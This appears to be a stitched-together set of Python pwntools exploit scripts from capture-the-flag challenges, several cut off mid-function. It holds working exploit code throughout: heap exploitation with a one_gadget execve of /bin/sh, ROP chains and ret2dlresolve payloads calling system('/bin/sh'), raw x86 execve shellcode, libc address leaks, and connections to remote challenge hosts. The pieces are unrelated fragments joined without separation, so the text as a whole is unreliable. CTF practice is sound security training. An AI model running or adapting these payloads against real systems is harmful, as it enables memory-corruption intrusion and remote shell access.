def start_debugger(self): print "\n[*] iteration: %d" %self.iteration #퍼징 대상 어플리케이션 로드 및 seed 값 전달 pwn.process([self.exe,self.seed]).wait() #os.system(self.exe+" "+self.seed) #core파일이 생기면 count 횟수에 맞춰 이름을 변경하고 crashes 디렉터리로 옮김 if os.path.isfile("core"): print "\n[**] sementation fault is detected" if os.path.isdir("crashes") is not True: os.system("mkdir crashes") else: pass core="core"+str(self.count) os.system("mv core "+core) os.system("mv "+core+" crashes") self.count+=1
def exploit(*, remote=True, host="127.0.0.1", port=4242): print("Please: socat TCP-LISTEN:8080 openssl-connect:SERVER_HERE:4242,cert=client.pem,cafile=server.crt,verify=0") # socat -d TCP-LISTEN:1234,reuseaddr,fork openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 if remote: p = pwn.remote(host, port) else: p = pwn.process("./heapme", env={"LD_PRELOAD":"/root/veille/challenge/ctf/FIC_Hexpresso_2019_quals/pwn/secret_ressources/libc-2.23.so"}) # p.interactive() # 0xf1147 execve("/bin/sh", rsp+0x70, environ) # constraints: # [rsp+0x70] == NULL one_gadget_rce = 0xf1147 print("[+] Fill memory") for i in range(70, 80): create_disk(p, i, 32) print("B") write_disk(p, i, b"A" * 32) create_disk(p, 42, 16) print("[+] Fill freelist") for i in range(70, 80): delete_disk(p, i) print("#" * 100) for i in range(80, 100): create_disk(p, i, 16) print("Leak " + "#" * 100) print("=> 3 leak buffer of [5]") _, heap_leak = read_disk(p, 73) one_gadget_ptr_offset = heap_leak + 0x700 print("Leak main_arena ".ljust(100, "#")) create_disk(p, 50, 0x400) create_disk(p, 51, 16) delete_disk(p, 50) create_disk(p, 50, 16) _, main_arena = read_disk(p, 50) print(f"main_arena = {main_arena:x}") libc_base = main_arena - 0x3c4b98 print(f"libc_base = {libc_base:x}") one_gadget_rce += libc_base print(f"one_gadget_rce = {one_gadget_rce:x}") print("Upload one_gadget_rce ".ljust(100, "#")) create_disk(p, 50, 100) write_disk(p, 50, pwn.p64(one_gadget_rce)[:6]) read_disk(p, 50) print("Overwrite ".ljust(100, "#")) print("=> 12 => overwrite [4] Disk") write_disk(p, 82, pwn.p64(one_gadget_ptr_offset)) p.sendline("1") p.sendline("74") p.interactive()
from pwn import remote, process io = process('./pwn07') payload = b'AAAAAAAA\xa4\x00\x00\x00\x85\x00\x00\x00' io.recv() io.send(payload) io.interactive()
cmds = [ # "heap-analysis-helper", # "format-string-helper", # gdb_load_symbols_cmd(dbg_file, libc, r.libs()[libc.path]), # "bp * $_base() + 0x1337", ] gdb.attach(r, '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds)) return def exploit(r): # r.sendlineafter(b"> ", b"HelloPwn" ) r.interactive() return 0 if __name__ == "__main__": if len(sys.argv) >= 2: LOCAL = False context.log_level = "info" r = remote(sys.argv[1], int(sys.argv[2])) else: r = process([ elf.path, ]) #, env={"LD_PRELOAD": libc.path}) attach(r) # or #r = gdb.debug([elf.path, ], gdbscript='') exit(exploit(r))
import pwn host = "127.0.0.1" port = 1337 remote = False binary_path = './vuln' libc_path = './libc.so.6' ld_path = "./ld-2.27.so" binary = pwn.ELF(binary_path) libc = pwn.ELF(libc_path) rop_binary = pwn.ROP(binary) if remote: r = pwn.remote(host, port) else: # r = pwn.process(binary_path) r = pwn.process([ld_path, binary_path], env={"LD_PRELOAD": libc_path}) r.interactive() r.close()
from pwn import p32 from pwn import u32 from pwn import process from pwn import gdb from pwn import context ret2win_offset = 0x1f7 fhf_plt = 0x80485f0 context.terminal = ['xterm', '-e', 'sh', '-c'] p = process("./pivot32") p.recvline() p.recvline() p.recvline() p.recvline() MA = p.recvline()[-11:].strip("\n") # Get address of fake stack write print("[+] Mapped segment writing to: {}".format(MA)) # Fake Stack Written to Mapped Section buf = p32(fhf_plt) buf += p32(0x080488c0) # 0x080488c0: pop eax; ret; buf += p32(0x804a024) # fhf_got buf += p32(0x80488c4) # 0x080488c4: mov eax, dword ptr [eax]; ret; buf += p32(0x08048571) # 0x08048571: pop ebx; ret; buf += p32(ret2win_offset) # 0x1f7 buf += p32(0x80488c7) # 0x080488c7: add eax, ebx; ret; buf += p32(0x080486a3) # 0x080486a3: call eax; buf += p32(0xdeadbeef) # Show end of fake stack
def __init__(self, remote, binary=None, libc=None, host=None, port=None, *a, **kw): if not remote: # Local binary self.tube = pwn.process(binary, *a, **kw) if libc is None else \ pwn.process(binary, env={'LD_PRELOAD': libc}, *a, **kw) else: # Remote challenge self.tube = pwn.remote(host, port)
def _init(self): self._process = process([environ["SHELL"], "-i", "-c", self._procname + " -q"]) self._process.recvrepeat(0.3) self.send("set confirm off") self._loadfile()
c = '' c += pwn.pack(buf2_address) # rbp = buf2_address c += pwn.pack(0x00000000004006b3) # pop rdi c += pwn.pack(buf2_address + 32) # */bin/sh c += pwn.pack(system_address) c += '/bin/sh\x00' return c if __name__ == '__main__': if pwnlib.args.args['REMOTE']: p = pwn.connect('csie.ctf.tw', 10132) else: p = pwn.process('./migr4ti0n-5b1ebb81d74911197f610391688c934210d79274') libc = pwn.ELF('./libc.so.6-14c22be9aa11316f89909e4237314e009da38883') payload1 = 'a' * 48 + ropchain_1() pwn.gdb.attach(p, gdbscript='b *0x40064a') # + str(hex(buf1_address))) p.send(payload1) p.sendline(ropchain_2()) print p.recvline() # try your best puts_got = p.recvline() puts_got = pwn.u64(puts_got[:-1].ljust(8, '\x00')) print hex(puts_got)
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools #################### #### CONNECTION #### #################### LOCAL = False REMOTETTCP = True REMOTESSH = False GDB = False LOCAL_BIN = "./vuln" REMOTE_BIN = "~/vuln" #For ssh LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it if LOCAL: P = process(LOCAL_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets elif REMOTETTCP: P = remote('10.10.10.10', 1339) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets elif REMOTESSH: ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='******', port=2220) p = ssh_shell.process(REMOTE_BIN) # start the vuln binary elf = ELF(LOCAL_BIN) # Extract data from binary
#!/usr/bine/env python import pwn import r2pipe import json bin = './crackme0x00' r = r2pipe.open(bin) t = pwn.process(bin) token = r.cmdj('izj')[2]['string'].decode('base64') print '[+] Using {} as the password'.format(token) t.readline() t.sendline(token) print t.readline()
import pwn BINARY = "{{ binary }}" REMOTE = ("{{ remote_host }}", {{ remote_port }}) if pwn.args['REMOTE']: p = pwn.remote(REMOTE[0], REMOTE[1]) elf = pwn.ELF(BINARY) {% if libc is not none %}libc = pwn.ELF("{{ libc['REMOTE'] }}"){% endif %} else: p = pwn.process(BINARY) elf = p.elf {% if libc is not none %}libc = pwn.ELF("{{ libc['LOCAL'] }}"){% endif %} def ropchain(chain, save=None): def flatten(arr): s = [] for e in arr: if isinstance(e, list): s += flatten(e) else: if isinstance(e, int): e = pwn.p32(e) s.append(e) return s rop = b''.join(flatten(chain)) if save is not None: with open(save, 'wb') as w: w.write(rop + b'\n')
#!/usr/bin/env python2 import pwn remote = True flag = "" last_char = "" index = 0 while last_char != '}': if remote: r = pwn.remote("babytrace.quals2019.oooverflow.io", 5000) else: r = pwn.process("pitas.py") # Header r.recvuntil("# Are you ready for the PITA?\n\n") # Binary select r.recvuntil("Choice: ") r.sendline("2") # start trace r.recvuntil("Choice: ") r.sendline("1") # add input constraint r.recvuntil("Choice: ") r.sendline("3") # r.sendline("input")
from roputils import * from pwn import process binary = 'xdctf-pwn200' r = process(binary) rop = ROP(binary) offset = 112 bss_base = rop.section('.bss') buf = rop.fill(offset) buf += rop.call('read', 0, bss_base, 100) # after using read to construct our symtab in .bss + 20, we use dl_resolve to call it buf += rop.dl_resolve_call(bss_base + 20, bss_base) r.send(buf) # over here we just fill in .bss with the data we need buf = rop.string('/bin/sh') buf += rop.fill(20, buf) buf += rop.dl_resolve_data(bss_base + 20, 'system') r.send(buf) r.interactive()
from roputils import * from pwn import process from pwn import gdb from pwn import context r = process('./main') context.log_level = 'debug' r.recv() rop = ROP('./main') offset = 112 bss_base = rop.section('.bss') buf = rop.fill(offset) buf += rop.call('read', 0, bss_base, 100) # used to call dl_Resolve() buf += rop.dl_resolve_call(bss_base + 20, bss_base) r.send(buf) buf = rop.string('/bin/sh') buf += rop.fill(20, buf) # used to make faking data, such relocation, Symbol, Str buf += rop.dl_resolve_data(bss_base + 20, 'system') buf += rop.fill(100, buf) r.send(buf) r.interactive()
import os os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp') import pwn from struct import pack remote_binary = "./vuln" pr = pwn.process(remote_binary) def segfault(): """ find offset with pwn.cyclic """ ofs = pwn.cyclic_find(pwn.p32(0x61616168)) payload = b"A" * ofs + create_ropgadget() pr.sendlineafter("Can you ROP your way out of this one?\n", payload) pr.interactive() def create_rop(): binary = pwn.ELF.from_assembly( "pop eax;pop ebx;pop ecx" ) rop = pwn.ROP(binary)#remote_binary) return rop.chain() def create_ropgadget(): # execve generated by ROPgadget # ROPgadget --binary ./vuln --ropchain --badbytes 0a # Padding goes here p = ''
gc(); d = new Date(oo); str.concat(ooo); ''' % payload.__repr__()[1:-1] r.send(oneline(js_payload) + '\n') remote_addr = None binary_filename = './build/debug/js' if remote_addr: r = pwn.remote(*remote_addr) else: r = pwn.process(binary_filename, aslr=0) pwn.context.terminal = ['tmux', 'splitw', '-h'] # find useful offsets in binary binary = pwn.ELF(binary_filename) sentinel_offset = binary.symbols['sentinel'] realloc_got_offset = binary.got['realloc'] # find useful offsets in libc libc = pwn.ELF('/lib/x86_64-linux-gnu/libc.so.6') realloc_offset = libc.symbols['realloc'] system_offset = libc.symbols['system'] gets_offset = libc.symbols['gets']
from pwnlib import shellcraft from pwnlib.args import args from pwn import connect, process, p64, asm shellcode = shellcraft.amd64.linux.sh() shellcode = asm(shellcode, arch='amd64', os='linux') print len(shellcode) payload = 'x' * 248 + p64(0x601080) if args['REMOTE']: p = connect('csie.ctf.tw', 10126) else: p = process('./ret2sc-a6a74cce51b034b6570e5416a38973c195d1b414') p.sendline(shellcode) p.sendline(payload) p.interactive()
from roputils import * import pwn # pwn.context(log_level="debug") fpath = "./pwn1" offset = 504 rop = ROP(fpath) # print rop.fpath # p = Proc(rop.fpath) p = pwn.process(rop.fpath) # p = pwn.remote("127.0.0.1",12346) pwn.gdb.attach(p,"b*0x804859c\nc") # addr_bss = rop.section('.bss') addr_bss = 0x0804A080 # buf = rop.retfill(offset) # buf = rop.dl_resolve_call(addr_bss+0x110, addr_bss)# # buf += p32(addr_bss+len(buf)+0x10+0x4) # buf += 'a'*0x10 # buf += rop.string('/bin/sh') # buf += (0x110-len(buf))*'a' # buf += rop.dl_resolve_data(addr_bss+0x110, 'system') # buf += (0x1f4-len(buf))*'a' buf = p32(0x0804A080+4)+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" buf += (0x1f4-len(buf))*'a' p.send(buf)
import pwn import struct import time import subprocess import re LOCAL = False if LOCAL: sh = pwn.process('hive') else: sh = pwn.remote('104.196.102.240', 5000) def get_timestamp_hash (timestamp) : proc = subprocess.Popen('./hive_patched', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) stdout, stderr = proc.communicate(struct.pack('<L', timestamp)) return stdout[-33:] def login(sh): initial = sh.recv(1024) timestr = re.findall('time is: (.*?),', initial)[0] print '[+] timestr', timestr timehash = get_timestamp_hash(int(timestr)) print '[+] timehash', timehash sh.sendline('username') sh.sendline('5up3rm@n') sh.sendline(timehash) def build_rop(): pack = struct.pack
optimizer=keras.optimizers.Adam(lr=1e-2), metrics=['accuracy']) model.fit(X, Y, epochs=300) y_pred = model.predict(X) print(y_pred, Y) response = ''.join([chr(int(256 * a)) for a in y_pred.ravel()]) print('Response is ... ', response) print("IT'S MORE EASY THAN TATH!") print( "Just put to 0 everythng, invert ouput function and assign only bias term." ) bias = [np.log(i / (1 - i)) for i in y] #bias = [-0.41197978912935806, -0.31508104663989539, -0.49419322371684876, -0.39570893316279959] print(bias) conn = process('Challenge/Pilgrim/NNawkward_pilgrim') conn.sendline('1') conn.sendline('3') conn.sendline() for _ in range(16): conn.sendline('0') conn.sendline('4') conn.sendline() for i in range(4): conn.sendline('0') for i in range(4): conn.sendline('%.14f' % bias[i]) conn.sendline('2') conn.interactive()
#!/usr/bin/env python import pwn libc = pwn.ELF('libc.so') elf_Demo = pwn.ELF('Demo') attack = pwn.process('./Demo') # attack = remote('127.0.0.1', 23333) plt_write = elf_Demo.symbols['write'] print '###### plt_write = ' + hex(plt_write) got_write = elf_Demo.got['write'] print '###### got_write = ' + hex(got_write) overflow_addr = 0x08048471 print '###### overflow_addr = ' + hex(overflow_addr) payload = 140 * 'a' payload += pwn.p32(plt_write) payload += pwn.p32(overflow_addr) payload += pwn.p32(1) payload += pwn.p32(got_write) payload += pwn.p32(4) print "[1] Sending payload" attack.send(payload) print "[2] Receiving addr_write" addr_write = pwn.u32(attack.recv(4)) print 'addr_write = ' + hex(addr_write)
#!/usr/bin/python import pwn payload = b"A" * 40 + pwn.pack(0x0804851b, 32) + b"\n" payload2 = b"AAAAAAAAAAAAAAAAAAA\n" p = pwn.process("./kanagawa") #p = pwn.remote("challs.dvc.tf", 4444) p.send(payload) print(p.recv()) p.send(payload2) print(p.recv())
def local(argv=[], *a, **kw): '''Execute the target binary locally''' if pwn.args.GDB: return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return pwn.process([exe.path] + argv, *a, **kw)
def startIt(): global p global fmtStr p = process(os.path.join(SCRIPTDIR,fName),buffer_fill_size=0xffff) p.recvuntil("Input: ") fmtStr = FormatString(exec_fmt,elf=elf)
def __init__(self, pdir): print colored('>> Happy pwning !', 'cyan') self.conn = pwn.process(pdir)
from pwn import process from tempfile import NamedTemporaryFile with NamedTemporaryFile() as f: f.write("Hello.") p = process(["/usr/bin/sudobcvi", f.name]) p.sendline("r") print p.recv(1024)
print("New email:") hexdump(email) print() if len(sys.argv) > 1: # Only do the IO stuff if we run with args (doesn't matter what). # This is so we can test the functions above without intializing pwntools # every time. if sys.argv[1] == 'r': # Run on remote p = pwn.remote('chal.2020.sunshinectf.org', port=10001) else: # Debug local process p = pwn.process('./runpeg -p peg_rev_checker.so LicenseChecker.peg -d', shell=True) p.recvuntil('EAR debugger') p.sendline('') p.recvuntil('(dbg) ') p.sendline('b 0x01E8') p.sendline('c') p.recvuntil('Email: ') p.send(email) p.recvuntil('License key: ') license = b''.join(license) p.send(license)
import pwn import re import os elf = pwn.ELF('./be-quick-or-be-dead-2') fib_number = 4368447739709774716003881551397205159088952756411141941533814668901464054869881997817744932743716769887780898920209866426445447485522551760777962122217963045451173078851717190916177144613851841799958503738854017612313939353 # modifying alarm function to do nothing using 'ret' elf.asm(elf.symbols['alarm'], 'ret') # modifying 'calculate_key function to return the number after changing it into 32-bits, Hopper can be used to find the function name and fib_number elf.asm(elf.symbols['calculate_key'], 'mov eax,%s\nret\n' % (hex(fib_number & 0xFFFFFFFF))) # saving to new binary elf.save('./new') os.system('chmod +x ./new') p = pwn.process('./new') prompt = p.recvall() flag = re.findall('\n(.*)', prompt)[5] print flag
import pwn # Setup enviroment process = pwn.process("./split") pwn.context(os="linux", arch="amd64") elf = pwn.ELF("split") rop = pwn.ROP(elf) rop.system(next(elf.search("cat flag"))) print str(rop.dump()) process.readline() process.readline() process.readline() payload = "A" * 40 + rop.chain() print payload process.sendline(payload) process.readline() print process.readline()[2:] process.shutdown()
""" # NOTES: # It's not pretty, but it worked. # Comments + slight modifications added post-solve. # export PROG='/bin/ls' before running to mimic server environment. if not ONLINE: LIBC_PATH = "/lib/i386-linux-gnu/libc.so.6" if GDB_BEGIN: log("Starting with GDB BEGIN") c = pwn.gdb.debug(BINARY_PATH, GDB_SCRIPT) else: log("Starting \"{}\"".format(BINARY_PATH)) c = pwn.process(BINARY_PATH) if GDB_DEBUG: log("Attaching GDB") pwn.gdb.attach(c, GDB_SCRIPT) else: LIBC_PATH = "./libc-2.27.so" c = pwn.connect(HOST, PORT) LIBC = pwn.ELF(LIBC_PATH) # Really gross way of parsing out the leaked data... def grossLeak(leak, payload): try: # Get what we're interested in. leak = "'$'".join(
import pwn #p = pwn.remote("chall.pwnable.tw", 10000) p = pwn.process("./start") output = p.recv(20) # 20 bytes | return address | esp | ->saved esp points here<- payloud = "a" * 20 + pwn.p32(0x8048087) p.send(payloud) output = p.recv(20) esp = pwn.u32(output[:4]) pwn.log.info("output: " + repr(output)) pwn.log.info("leaked esp: {}".format(hex(esp))) #shellcode = open("hello.bin", 'rb').read() shellcode = open("nasm.bin", 'rb').read() #shellcode = "1\xc0\xb0\x0b1\xc91\xbd2Rhn/shh//bi" # second time through: # 20 bytes | return address | esp v points at byte 4 of 20 # xxxxxxxx xxxxxxxxxxxxxx | 20 more bytes... : | eip | shellcode # our second payload is written starting where esp used to be stored, # which is at esp-4 ecx = esp - 4 payload = "a" * 20 + pwn.p32(ecx + 24) + shellcode assert len(payload) < 0x3c p.send(payload) #print(p.read(4))
#!/usr/bin/env python3 import pwn rem = pwn.process('./unlink') stack_addr = int(rem.recvline().split()[5], 0) heap_addr = int(rem.recvline().split()[5], 0) ret_addr = stack_addr + 0x28 jmp_addr = heap_addr + 0x20 shell_func = 0x080484eb pwn.context.arch = 'i386' shellcode = pwn.asm(''' jmp safe nop nop nop nop safe: push 0x080484eb ret ''') payload = b'A' * 16 + pwn.p32(heap_addr) + pwn.p32(stack_addr) + shellcode pwn.pause() rem.sendline(payload) rem.interactive()
#!/usr/bin/env python import pwn import re p = pwn.process(['./jmper']) pwn.context.terminal = ['tmux', 'splitw', '-h', '-p', '75'] stdouttosys = -0x17bba0 def add_student(n=1): for i in range(n): p.recvuntil(":)") p.sendline("1") return def name_student(ID, name, sen=0): p.recvuntil(":)") p.sendline("2") p.recvuntil("ID:") p.sendline(str(ID)) p.recvuntil("name:") if sen == 0: p.sendline(name) else: p.send(name) return def write_memo(ID, memo, sen=0):
def runchain(exe, ch): proc = pwn.process(exe) proc.sendline(ch) return proc.recvall()
#!/usr/bin/env python3 import pwn if pwn.args['LOCAL']: io = pwn.process(['./alive_note']) else: io = pwn.remote('chall.pwnable.tw', 10300) elf = pwn.ELF('./alive_note') #shellcode = pwn.asm(''' #xor al, 0x32 #xor al, 0x33 #xor al, 0x34 #xor al, 0x35 #''') shellcode0 = 'PYjAXEqH' shellcode1 = '4AHEEEqH' def add_note(index, data, pad=False): io.recvuntil('Your choice :') io.sendline(str(1)) io.recvuntil('Index :') io.sendline(str(index)) io.recvuntil('Name :') io.sendline(data) if not pad: for i in range(3): add_note(9, 'A' * 8, True)
p += pack('<I', 0x080ea068) # @ .data + 8 p += pack('<I', 0x08054370) # xor eax, eax ; ret #p += pack('<I', 0x080a18cd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08065952) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x080481c9) # pop ebx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x0806e971) # pop ecx ; pop ebx ; ret p += pack('<I', 0x080ea068) # @ .data + 8 p += pack('<I', 0x080ea060) # padding without overwrite ebx p += pack('<I', 0x0806e94a) # pop edx ; ret p += pack('<I', 0x080ea068) # @ .data + 8 p += pack('<I', 0x08054370) # xor eax, eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x0807b39f) # inc eax ; ret p += pack('<I', 0x080493f1) # int 0x80 r = process('./pratice4') r.recvuntil('name ?') r.sendline(p) r.interactive()
import re import pwn CANARY = 0x8049D68 USE_GDB = False if USE_GDB: p = pwn.process(['gdb', './www']) _ = p.recvuntil('gdb-peda$ ') p.sendline('b strcmp') _ = p.recvuntil('gdb-peda$ ') p.sendline('r') # Adjust amount of recvlines if necessary. print p.recvline() print p.recvline() print p.recvline() print p.recvline() else: p = pwn.process('./www') _ = p.recvline() buffer_line = p.recvline().rstrip('\n') m = re.match(r"buffers at 0x([a-f0-9]+) and 0x([a-f0-9]+)", buffer_line) b1_address = int(m.group(1), 16) b2_address = int(m.group(2), 16) pwn.log.info("Buffers at {:08x} and {:08x}".format(b1_address, b2_address))